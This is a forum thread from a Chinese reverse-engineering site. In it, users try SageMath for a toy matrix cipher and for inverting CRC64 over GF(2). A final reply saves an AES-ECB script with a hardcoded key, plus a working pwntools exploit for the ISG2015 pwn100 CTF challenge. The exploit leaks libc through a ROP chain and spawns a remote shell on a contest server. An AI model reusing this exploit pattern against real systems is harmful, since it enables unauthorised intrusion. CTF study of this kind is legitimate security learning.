首页
社区
课程
招聘
[原创]sage初探
发表于: 2015-12-13 19:32 8704

[原创]sage初探

2015-12-13 19:32
8704
sage这个数学工具不错,在eclipse里面就可以执行,会点python和数学知识就可以耍起来。
写了个脚本贴这里以后好找。

import os
from sage.all import *

os.environ.__setitem__('SAGE_ROOT', '/home/sage/sage-6.7')
os.environ.__setitem__('PATH', os.environ.__getitem__('SAGE_ROOT') +':' + os.environ.__getitem__('PATH'))
os.environ.__setitem__('LD_LIBRARY_PATH',os.environ.__getitem__('SAGE_ROOT')+'/local/lib')

sentences=[
"ThelightTokeepinmindtheholylight",
"Timeismoneymyfriend",
"WelcometotheaugerRuiMa",
"Areyouheretoplayforthehorde",
"ToarmsyeroustaboutsWevegotcompany",
"Ahhwelcometomyparlor",
"Slaytheminthemastersname",
"YesrunItmakesthebloodpumpfaster",
"Shhhitwillallbeoversoon",
"Kneelbeforemeworm",
"Runwhileyoustillcan",
"RisemysoldiersRiseandfightoncemore",
"LifeismeaningleshThatwearetrulytested"]

N = 13
S=[[0 for col in range(N)] for row in range(N)]
for i in range(N):
    for j in range(N):
        if j<len(sentences[i]):
            S[i][j]=ord(sentences[i][j])
            
key='bbs.pediy.com'
M=Matrix(S)
print 'M is:\n',M      #M.rank()
X=vector(map(ord,key))
print 'Key is \''+ key +'\''
enc=''.join(['%#6x'%t for t in M*X]).replace('0x','')
print 'Encrypted text is:\n',enc
y=[]
for i in range(0,len(enc),5):
    y.append(int(enc[i:i+5],16))   
Y=vector(y)
print 'Key is \''+''.join(map(chr,M.solve_right(Y)))+'\''

输出:
M is:
[ 84 104 101 108 105 103 104 116  84 111 107 101 101]
[ 84 105 109 101 105 115 109 111 110 101 121 109 121]
[ 87 101 108  99 111 109 101 116 111 116 104 101  97]
[ 65 114 101 121 111 117 104 101 114 101 116 111 112]
[ 84 111  97 114 109 115 121 101 114 111 117 115 116]
[ 65 104 104 119 101 108  99 111 109 101 116 111 109]
[ 83 108  97 121 116 104 101 109 105 110 116 104 101]
[ 89 101 115 114 117 110  73 116 109  97 107 101 115]
[ 83 104 104 104 105 116 119 105 108 108  97 108 108]
[ 75 110 101 101 108  98 101 102 111 114 101 109 101]
[ 82 117 110 119 104 105 108 101 121 111 117 115 116]
[ 82 105 115 101 109 121 115 111 108 100 105 101 114]
[ 76 105 102 101 105 115 109 101  97 110 105 110 103]
Key is 'bbs.pediy.com'
Encrypted text is:
1f359216982037e20d1e21ac9200dc204ba206a5207061f7d121b27211391fa57
Key is 'bbs.pediy.com'

    编译sage花几个小时,让eclipse执行sage脚本也比较麻烦,花了半天最后还是搞定了,发个贴留个纪念。

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 2015
活跃值: (902)
能力值: ( LV12,RANK:1000 )
在线值:
发帖
回帖
粉丝
2
#-*- coding:utf-8 -*-
import os
from sage.all import *
os.environ.__setitem__('SAGE_ROOT', '/home/ty/sage-6.9')
os.environ.__setitem__('PATH', os.environ.__getitem__('SAGE_ROOT') +':' + os.environ.__getitem__('PATH'))
os.environ.__setitem__('LD_LIBRARY_PATH',os.environ.__getitem__('SAGE_ROOT')+'/local/lib')

Qtable = [0x0, 0xb1aa069af3404101L, 0x7a66f79fc2063341, 0xcbccf10531467240L, 0xf4cdef3f840c6682L, 0x4567e9a5774c2783, 0x8eab18a0460a55c3L, 0x3f011e3ab54a14c2, 0xf0a924d52c9e7c47L, 0x4103224fdfde3d46, 0x8acfd34aee984f06L, 0x3b65d5d01dd80e07, 0x464cbeaa8921ac5, 0xb5cecd705bd25bc4L, 0x7e023c756a942984, 0xcfa83aef99d46885L, 0xf860b3007dba49cdL, 0x49cab59a8efa08cc, 0x8206449fbfbc7a8cL, 0x33ac42054cfc3b8d, 0xcad5c3ff9b62f4f, 0xbd075aa50af66e4eL, 0x76cbaba03bb01c0e, 0xc761ad3ac8f05d0fL, 0x8c997d55124358a, 0xb963914fa264748bL, 0x72af604a932206cb, 0xc30566d0606247caL, 0xfc0478ead5285308L, 0x4dae7e7026681209, 0x86628f75172e6049L, 0x37c889efe46e2148, 0xe9f39caadff222d9L, 0x58599a302cb263d8, 0x93956b351df41198L, 0x223f6dafeeb45099, 0x1d3e73955bfe445b, 0xac94750fa8be055aL, 0x6758840a99f8771a, 0xd6f282906ab8361bL, 0x195ab87ff36c5e9e, 0xa8f0bee5002c1f9fL, 0x633c4fe0316a6ddf, 0xd296497ac22a2cdeL, 0xed9757407760381cL, 0x5c3d51da8420791d, 0x97f1a0dfb5660b5dL, 0x265ba64546264a5c, 0x11932faaa2486b14, 0xa039293051082a15L, 0x6bf5d835604e5855, 0xda5fdeaf930e1954L, 0xe55ec09526440d96L, 0x54f4c60fd5044c97, 0x9f38370ae4423ed7L, 0x2e92319017027fd6, 0xe13a0b7f8ed61753L, 0x50900de57d965652, 0x9b5cfce04cd02412L, 0x2af6fa7abf906513, 0x15f7e4400ada71d1, 0xa45de2daf99a30d0L, 0x6f9113dfc8dc4290, 0xde3b15453b9c0391L, 0xcad5c3ff9b62f4f1L, 0x7b7fc5656822b5f0, 0xb0b334605964c7b0L, 0x11932faaa2486b1, 0x3e182cc01f6e9273, 0x8fb22a5aec2ed372L, 0x447edb5fdd68a132, 0xf5d4ddc52e28e033L, 0x3a7ce72ab7fc88b6, 0x8bd6e1b044bcc9b7L, 0x401a10b575fabbf7, 0xf1b0162f86bafaf6L, 0xceb1081533f0ee34L, 0x7f1b0e8fc0b0af35, 0xb4d7ff8af1f6dd75L, 0x57df91002b69c74, 0x32b570ffe6d8bd3c, 0x831f76651598fc3dL, 0x48d3876024de8e7d, 0xf97981fad79ecf7cL, 0xc6789fc062d4dbbeL, 0x77d2995a91949abf, 0xbc1e685fa0d2e8ffL, 0xdb46ec55392a9fe, 0xc21c542aca46c17bL, 0x73b652b03906807a, 0xb87aa3b50840f23aL, 0x9d0a52ffb00b33b, 0x36d1bb154e4aa7f9, 0x877bbd8fbd0ae6f8L, 0x4cb74c8a8c4c94b8, 0xfd1d4a107f0cd5b9L, 0x23265f554490d628, 0x928c59cfb7d09729L, 0x5940a8ca8696e569, 0xe8eaae5075d6a468L, 0xd7ebb06ac09cb0aaL, 0x6641b6f033dcf1ab, 0xad8d47f5029a83ebL, 0x1c27416ff1dac2ea, 0xd38f7b80680eaa6fL, 0x62257d1a9b4eeb6e, 0xa9e98c1faa08992eL, 0x18438a855948d82f, 0x274294bfec02cced, 0x96e892251f428decL, 0x5d2463202e04ffac, 0xec8e65badd44beadL, 0xdb46ec55392a9fe5L, 0x6aeceacfca6adee4, 0xa1201bcafb2caca4L, 0x108a1d50086ceda5, 0x2f8b036abd26f967, 0x9e2105f04e66b866L, 0x55edf4f57f20ca26, 0xe447f26f8c608b27L, 0x2befc88015b4e3a2, 0x9a45ce1ae6f4a2a3L, 0x51893f1fd7b2d0e3, 0xe023398524f291e2L, 0xdf2227bf91b88520L, 0x6e88212562f8c421, 0xa544d02053beb661L, 0x14eed6baa0fef760, 0x8c997d55124358a1L, 0x3d337bcfe10319a0, 0xf6ff8acad0456be0L, 0x47558c5023052ae1, 0x7854926a964f3e23, 0xc9fe94f0650f7f22L, 0x23265f554490d62, 0xb398636fa7094c63L, 0x7c3059803edd24e6, 0xcd9a5f1acd9d65e7L, 0x656ae1ffcdb17a7, 0xb7fca8850f9b56a6L, 0x88fdb6bfbad14264L, 0x3957b02549910365, 0xf29b412078d77125L, 0x433147ba8b973024, 0x74f9ce556ff9116c, 0xc553c8cf9cb9506dL, 0xe9f39caadff222d, 0xbf353f505ebf632cL, 0x8034216aebf577eeL, 0x319e27f018b536ef, 0xfa52d6f529f344afL, 0x4bf8d06fdab305ae, 0x8450ea8043676d2bL, 0x35faec1ab0272c2a, 0xfe361d1f81615e6aL, 0x4f9c1b8572211f6b, 0x709d05bfc76b0ba9, 0xc1370325342b4aa8L, 0xafbf220056d38e8, 0xbb51f4baf62d79e9L, 0x656ae1ffcdb17a78, 0xd4c0e7653ef13b79L, 0x1f0c16600fb74939, 0xaea610fafcf70838L, 0x91a70ec049bd1cfaL, 0x200d085abafd5dfb, 0xebc1f95f8bbb2fbbL, 0x5a6bffc578fb6eba, 0x95c3c52ae12f063fL, 0x2469c3b0126f473e, 0xefa532b52329357eL, 0x5e0f342fd069747f, 0x610e2a15652360bd, 0xd0a42c8f966321bcL, 0x1b68dd8aa72553fc, 0xaac2db10546512fdL, 0x9d0a52ffb00b33b5L, 0x2ca05465434b72b4, 0xe76ca560720d00f4L, 0x56c6a3fa814d41f5, 0x69c7bdc034075537, 0xd86dbb5ac7471436L, 0x13a14a5ff6016676, 0xa20b4cc505412777L, 0x6da3762a9c954ff2, 0xdc0970b06fd50ef3L, 0x17c581b55e937cb3, 0xa66f872fadd33db2L, 0x996e991518992970L, 0x28c49f8febd96871, 0xe3086e8ada9f1a31L, 0x52a2681029df5b30, 0x464cbeaa8921ac50, 0xf7e6b8307a61ed51L, 0x3c2a49354b279f11, 0x8d804fafb867de10L, 0xb28151950d2dcad2L, 0x32b570ffe6d8bd3, 0xc8e7a60acf2bf993L, 0x794da0903c6bb892, 0xb6e59a7fa5bfd017L, 0x74f9ce556ff9116, 0xcc836de067b9e356L, 0x7d296b7a94f9a257, 0x4228754021b3b695, 0xf38273dad2f3f794L, 0x384e82dfe3b585d4, 0x89e4844510f5c4d5L, 0xbe2c0daaf49be59dL, 0xf860b3007dba49c, 0xc44afa35369dd6dcL, 0x75e0fcafc5dd97dd, 0x4ae1e2957097831f, 0xfb4be40f83d7c21eL, 0x3087150ab291b05e, 0x812d139041d1f15fL, 0x4e85297fd80599da, 0xff2f2fe52b45d8dbL, 0x34e3dee01a03aa9b, 0x8549d87ae943eb9aL, 0xba48c6405c09ff58L, 0xbe2c0daaf49be59, 0xc02e31df9e0fcc19L, 0x718437456d4f8d18, 0xafbf220056d38e89L, 0x1e15249aa593cf88, 0xd5d9d59f94d5bdc8L, 0x6473d3056795fcc9, 0x5b72cd3fd2dfe80b, 0xead8cba5219fa90aL, 0x21143aa010d9db4a, 0x90be3c3ae3999a4bL, 0x5f1606d57a4df2ce, 0xeebc004f890db3cfL, 0x2570f14ab84bc18f, 0x94daf7d04b0b808eL, 0xabdbe9eafe41944cL, 0x1a71ef700d01d54d, 0xd1bd1e753c47a70dL, 0x601718efcf07e60c, 0x57df91002b69c744, 0xe675979ad8298645L, 0x2db9669fe96ff405, 0x9c1360051a2fb504L, 0xa3127e3faf65a1c6L, 0x12b878a55c25e0c7, 0xd97489a06d639287L, 0x68de8f3a9e23d386, 0xa776b5d507f7bb03L, 0x16dcb34ff4b7fa02, 0xdd10424ac5f18842L, 0x6cba44d036b1c943, 0x53bb5aea83fbdd81, 0xe2115c7070bb9c80L, 0x29ddad7541fdeec0, 0x9877abefb2bdafc1L]

def crc64(key):
    register = 0
    for x in map(ord,key):
        idx = (x ^ register ) & 0xff
        register = (register >> 8) ^ Qtable[idx]
    return long(register)

def crc64_(k):
    N = 9 # len of 'bbs.pediy'
    M = MatrixSpace(GF(2), 64, N * 7) #每个ascii字符只需要知道7位
    X = VectorSpace(GF(2), 63)
    base = crc64("\x00" * N)
    diffs = {}
    for i in range(N):
        for j in range(7):
            key = [0]*N
            key[i] = key[i] | (1 << j)
            diffs[i, j] = crc64(''.join(map(chr,key))) ^ base
      
    matrix = M()
    for (i, j), vec in diffs.items():
        column = i * 7 + 6-j
        for row in range(64):
            matrix[row, column] = (vec & (1 << row)) >> row
   
    xstr= ''.join(bin(ord(c)).replace('0b','').rjust(7,'0') for c in k)
    x = X([int(n) for n in xstr])
    v = matrix*x
    vstr=''.join([repr(n) for n in v])[::-1]
    return int(vstr,2) ^ base

print crc64('bbs.pediy')== crc64_('bbs.pediy')   # True
2015-12-14 23:03
0
雪    币: 2015
活跃值: (902)
能力值: ( LV12,RANK:1000 )
在线值:
发帖
回帖
粉丝
3
#-*- coding:utf-8 -*-
import os
from sage.all import *
os.environ.__setitem__('SAGE_ROOT', '/home/ty/sage-6.9')
os.environ.__setitem__('PATH', os.environ.__getitem__('SAGE_ROOT') +':' + os.environ.__getitem__('PATH'))
os.environ.__setitem__('LD_LIBRARY_PATH',os.environ.__getitem__('SAGE_ROOT')+'/local/lib')

Qtable = [0x0,...,0x29ddad7541fdeec0, 0x9877abefb2bdafc1L]
N = 9 # len of key
M = MatrixSpace(GF(2), 64, N * 7) #每个ascii字符只需要知道7位
V = VectorSpace(GF(2), 64)

def crc64(key):
    register = 0
    for x in map(ord,key):
        idx = (x ^ register ) & 0xff
        register = (register >> 8) ^ Qtable[idx]
    return long(register)

base = crc64("\x00" * N)
diffs = {}
for i in range(N):
    for j in range(7):
        key = [0]*N
        key[i] = key[i] | (1 << j)
        diffs[i, j] = crc64(''.join(map(chr,key))) ^ base
   
matrix = M()
for (i, j), vec in diffs.items():
    column = i * 7 + 6-j
    for row in range(64):
        matrix[row, column] = (vec & (1 << row)) >> row

DIFFERENCE =  0x82a320d616b5ef03L ^ base   #hex(crc64('bbs.pediy'))
v = V( [(DIFFERENCE & (1 << row)) >> row for row in range(64)] )
x = matrix.solve_right(v)
# s = [0] * N
# for i, v in enumerate(x):
#     i, j = divmod(i, 7)
#     if v:
#         s[i] |= (1 << (6-j))
# key = "".join(map(chr, s))
xstr=''.join([repr(n) for n in x])
key=''
for i in range(0,len(xstr),7):
    key+=chr(int(xstr[i:i+7],2))
print key  #bbs.pediy

超过9个字符解不唯一
2015-12-14 23:14
0
雪    币: 2015
活跃值: (902)
能力值: ( LV12,RANK:1000 )
在线值:
发帖
回帖
粉丝
4
python脚本收藏
#-*- coding:utf-8 -*-
from Crypto.Cipher import AES

def decrypt(enc,C_k):
    key=C_k
    while len(key)<32: key+='0'
    key=unicode(key,'utf-8').encode('utf-8')
    enc=enc.decode('hex')
    cipher = AES.new(key, AES.MODE_ECB)
    txt=cipher.decrypt(enc)
    phone=txt[:-ord(txt[-1])]
    phone=phone.decode('utf-8')
    return phone
           
def encrypt(phone,C_k):  
    key=C_k
    while len(key)<32: key+='0'
    key=unicode(key,'utf-8').encode('utf-8')
    p=unicode(phone,'utf-8').encode('utf-8')
    padnum=AES.block_size-len(p)
    p+=chr(padnum)*padnum
    cipher = AES.new(key, AES.MODE_ECB)
    enc=cipher.encrypt(p)
    return enc.encode('hex')     

C_k='sdtyffdftesfyfdw'
enc=encrypt('13249582075', C_k)     
print  enc
print  decrypt(enc, C_k)

'''
输出结果:
9613613dfc2eb43aee0f5df79f3c1d4e
13249582075
'''

#ISG2015 pwn100
from pwn import *
context(arch='i386', os='linux')
conn = remote('202.120.7.145', 9991)
elf = ELF('pwnme')
main = 0x804847d
rop=ROP(elf)
rop.call('write', [1,elf.got['__libc_start_main'],4])
rop.call(main)
payload = fit({20:rop.chain()},filler = 'A')
conn.send(payload+'\n')
print conn.recvn(45)
startmainva = unpack(conn.recvn(4))
libc = ELF('libc-2.19.so')   
systemva = startmainva+ libc.symbols['system']-libc.symbols['__libc_start_main']
shellva = startmainva + next(libc.search('/bin/sh\x00'))-libc.symbols['__libc_start_main']
rop=ROP(elf)
rop.call(systemva, [shellva])
rop.call(main)
payload = fit({12:rop.chain()},filler = 'C')
conn.send(payload+'\n')
conn.interactive()
2015-12-21 12:01
0
游客
登录 | 注册 方可回帖
返回
//